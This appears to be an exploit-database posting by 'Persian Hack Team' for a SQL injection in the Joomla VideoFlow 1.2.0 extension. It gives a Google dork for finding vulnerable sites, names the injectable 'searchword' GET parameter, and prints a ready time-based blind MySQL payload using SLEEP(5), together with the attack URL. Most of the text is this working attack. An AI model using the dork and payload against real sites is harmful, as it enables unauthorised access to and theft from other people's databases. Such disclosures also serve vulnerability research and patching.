Home / os / winmobile

Joomla VideoFlow 1.2.0 SQL Injection

Posted on 24 May 2017

# Exploit Title: Joomla VideoFlow 1.2.0 - SQL Injection # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (Mojtaba Kazemi) # Vendor Home : https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/videoflow/ # My Home : http://persian-team.ir/ # Google Dork : inurl:index.php?option=com_videoflow searchword # Telegram Channel: @PersianHackTeam # Tested on: Linux # Date: 2017-05-23 # POC : # SQL Injection : Parameter: searchword (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: option=com_videoflow&task=search&vs=1&searchword=Tutorialaa') AND (SELECT * FROM (SELECT(SLEEP(5)))DBYE) AND ('bEOv'='bEOv&layout=listview&Itemid=2 http://server/index.php?option=com_videoflow&task=search&vs=1&searchword=[SQL]&layout=listview&Itemid=2 # Greetz : T3NZOG4N & FireKernel # Iranian White Hat Hackers # Chera Zang Nemizanid D:

 

TOP